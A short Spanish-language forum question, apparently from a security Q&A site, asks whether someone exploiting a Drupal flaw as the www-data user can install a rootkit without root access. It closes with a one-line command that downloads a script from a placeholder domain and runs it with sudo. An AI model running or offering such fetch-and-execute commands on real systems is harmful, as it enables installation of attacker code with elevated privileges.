He visto algunas publicaciones sobre la búsqueda de rootkits, pero no he podido encontrar ninguna información sobre cómo acceder a un sistema Linux. En particular, si explota un error en un sitio web php (sí, estoy hablando de drupageddon aquí), ¿es posible instalar un rootkit aunque solo pueda ejecutarse como servidor web (www-data) y no como root. La poca información que he encontrado sobre cómo se instalan sugiere que debe ser root para instalarlos (consulte aquí ).
wget http://mydomain/script.sh;sudo ./script.sh